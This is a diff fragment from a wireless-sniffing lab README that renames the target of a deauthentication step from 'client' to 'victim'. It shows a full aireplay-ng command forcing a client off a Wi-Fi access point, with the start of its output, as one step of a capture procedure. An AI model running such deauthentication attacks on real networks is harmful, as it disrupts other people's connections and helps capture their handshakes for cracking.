TomCordemans/LABS/docs/wireless-sniffing/README.md

         root@kali:~#
         ```
-        2.While capturing data in one terminal, deautenticate the client in a second terminal.
+        2.While capturing data in one terminal, deautenticate the victim in a second terminal.
         ```
         root@kali:~# aireplay-ng --deauth 2 -a 68:FF:7B:45:A5:88 -c C0:33:5E:DD:CA:FD wlan1mon
         19:10:10  Waiting for beacon frame (BSSID: 68:FF:7B:45:A5:88) on channel 1